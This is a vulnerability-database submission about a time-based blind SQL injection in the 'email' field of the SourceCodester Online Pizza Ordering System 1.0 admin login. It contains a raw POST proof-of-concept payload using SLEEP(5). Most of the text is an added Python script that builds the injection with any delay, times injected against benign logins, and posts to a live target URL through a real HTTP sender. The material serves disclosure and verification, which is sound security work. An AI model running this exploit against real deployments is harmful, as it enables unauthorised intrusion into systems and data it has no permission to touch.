| Title | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 login page SQL Injection |
|---|
| Description | A SQL Injection vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0; a remote, unauthenticated attacker can exploit it by sending a crafted request. The vulnerable URI is /php-opos/admin/ajax.php?action=login2, which is the login page. The parameter 'email' is injectable.
An effective PoC is below:
POST /php-opos/admin/ajax.php?action=login2 HTTP/1.1
*************************************
email=abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl&password=def
This is a time-based blind injection; the server will respond after 5 s. |
|---|
| Source | https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 2023-03-17 07:47 AM (3 years ago) |
|---|
| Moderation | 2023-03-17 07:58 AM (12 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 223300 [SourceCodester Online Pizza Ordering System 1.0 Login Page ajax.php?action=login2 email SQL Injection] |
|---|
| Points | 20 |
|---|
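The PoC in the Description proves the injection only by a delay, so the check a reviewer wants is a timing oracle rather than a single slow response. The following is an added example, not code from the VulDB submission or from the SourceCodester project: it rebuilds the PoC's `email` value with a configurable SLEEP delay, times a benign login against the injected one over several samples, and accepts the result only when the median slowdown is at least half the requested delay. The URI, parameter names and payload shape come from the PoC above; `build_payload`, `confirm_time_based`, the `delay / 2` threshold and the two simulated servers are assumptions of this example. The simulated servers are constructed stand-ins so the check runs offline; `http_sender` is the real transport for a lab copy of the application.

```python
"""Timing oracle for the time-based blind SQL injection described above.

Added example, not code from the VulDB submission or from the SourceCodester
project. Only the URI, the parameter names and the payload shape come from the
PoC; build_payload, confirm_time_based, the simulated servers and the
delay/2 threshold are assumptions of this example.
"""
import random
import re
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict

TARGET_PATH = "/php-opos/admin/ajax.php?action=login2"
Sender = Callable[[Dict[str, str]], float]   # posts a form, returns seconds taken


def build_payload(base_email: str, delay: int) -> str:
    """The PoC's 'email' value, parametrised on the SLEEP delay.

    The single quote closes the string literal the query wraps the email in;
    the derived table forces SLEEP() to run once, and the trailing
    AND 'jFNl'='jFNl re-balances the quotes so the statement still parses.
    The constant 9110 and the aliases are arbitrary, as in the PoC.
    """
    return (f"{base_email}' AND (SELECT 9110 FROM (SELECT(SLEEP({delay})))XSlc)"
            f" AND 'jFNl'='jFNl")


def confirm_time_based(send: Sender, base_email: str = "abc@qq.com",
                       delay: int = 5, samples: int = 3) -> bool:
    """Compare a benign login against the injected one.

    A single slow response proves nothing (network jitter, a cold cache), so
    the median of several samples is used and the injected requests must be
    slower by at least half the requested delay, not merely slower.
    """
    benign = {"email": base_email, "password": "def"}
    injected = {"email": build_payload(base_email, delay), "password": "def"}
    benign_t = statistics.median(send(benign) for _ in range(samples))
    injected_t = statistics.median(send(injected) for _ in range(samples))
    return injected_t - benign_t >= delay / 2


def http_sender(base_url: str, timeout: float = 30.0) -> Sender:
    """Real transport for a lab instance: POST the form to the PoC URI."""
    def send(form: Dict[str, str]) -> float:
        req = urllib.request.Request(base_url + TARGET_PATH,
                                     data=urllib.parse.urlencode(form).encode(),
                                     method="POST")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout):
                pass
        except urllib.error.HTTPError:
            pass  # a failed login still reveals how long the query took
        return time.monotonic() - start
    return send


# --- Offline stand-ins (constructed for this example, not the real app) -----
_RNG = random.Random(1)
_PAYLOAD_RE = re.compile(
    r"'\s*AND\s*\(SELECT \d+ FROM \(SELECT\(SLEEP\((\d+)\)\)\)\w+\)"
    r"\s*AND\s*'(\w+)'='\2", re.I)


def simulated_vulnerable_server(form: Dict[str, str]) -> float:
    """Mimics code that concatenates `email` into the SQL string.

    A quote-balanced payload reaches the database and SLEEP(n) stalls the
    reply by n seconds; any other input answers at normal speed. The delay
    is returned rather than slept so the check runs instantly.
    """
    m = _PAYLOAD_RE.search(form.get("email", ""))
    delay = int(m.group(1)) if m else 0
    return delay + 0.2 + _RNG.random() * 0.1      # ~0.2-0.3 s baseline jitter


def simulated_patched_server(form: Dict[str, str]) -> float:
    """Mimics a prepared-statement login: the payload is just a string."""
    return 0.2 + _RNG.random() * 0.1


if __name__ == "__main__":
    print("vulnerable:", confirm_time_based(simulated_vulnerable_server))  # True
    print("patched:   ", confirm_time_based(simulated_patched_server))     # False
    # Against a lab copy: confirm_time_based(http_sender("http://127.0.0.1:8080"))
```

Run it as is to see the oracle accept the simulated vulnerable login and reject the simulated patched one; against a lab copy of the application, pass `http_sender("http://host:port")` instead, and raise `samples` on a noisy network rather than lowering the threshold.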